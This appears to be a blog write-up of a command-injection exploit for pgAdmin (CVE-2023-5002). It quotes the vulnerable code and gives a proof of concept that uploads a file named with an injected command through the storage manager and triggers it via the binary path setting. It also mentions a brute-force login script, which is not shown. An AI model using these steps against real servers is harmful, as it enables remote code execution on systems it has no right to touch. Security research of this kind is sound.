PgAdmin CVE-2023-5002 exploitation
This vulnerability is a continuation of vulnerability CVE-2022-4223 (there is a good article about this vulnerability).
A security researcher found the vulnerability and created a pull request with a fix and example of command injection:
>>> subprocess.getoutput(r'echo "{0}"'.format("Hello $(whoami)").replace('"', '""'))
Hello gronke
The problem is that pgadmin allows you to check the existence of utilities by passing the path to them:
in this case, validation is carried out only for the existence of such a path:
# if path doesn't exist raise exception
if not os.path.exists(binary_path):
current_app.logger.warning('Invalid binary path.')
raise Exception()
# Get the output of the '--version' command
version_string = \
subprocess.getoutput('"{0}" --version'.format(full_path))
For such a check to pass, the file must exist in the system. Fortunately, pgadmin has a storage manager that allows you to upload any files.
Proof of Concept
We have everything to exploit the vulnerability.
We should start by preparing a file that needs to be uploaded to pgadmin
. Since command execution occurs when the file name puts in subprocess.getoutput
, the file must simultaneously be a valid path and command.
$ touch 'test";id;#"'
$ python3
>>> import os, subprocess
>>> os.path.exists('test";id;#"')
>>> subprocess.getoutput('"{0}" --version'.format('test";id;#"'))
uid=1000(user) gid=1000(user) groups=1000(user)
After preparing the file, we need to upload it tools -> storage manager -> upload
Our file loaded, but the double quotes were removed:
We also need to rename the file to return double quotes instead of url encoded chars:
By default, pgadmin
saves all downloaded files in /var/lib/pgadmin/storage/
but with the @
character replaced by _
You can find the exact path in the settings (they can be read by an authorized user via the API
STORAGE_DIR = "/var/lib/pgadmin/storage"
And finally run our file for execution file -> preference -> binary path
used full path to our file /var/lib/pgadmin/storage/user_domain/test";id;#"
Bonus parts
Just a week ago (from the moment of writing this article) an issue was created in pgadmin with a new RCE (backup link).
Brute-force login
As a bonus to vulnerability, get a script for brute force login in PgAdmin as a gift.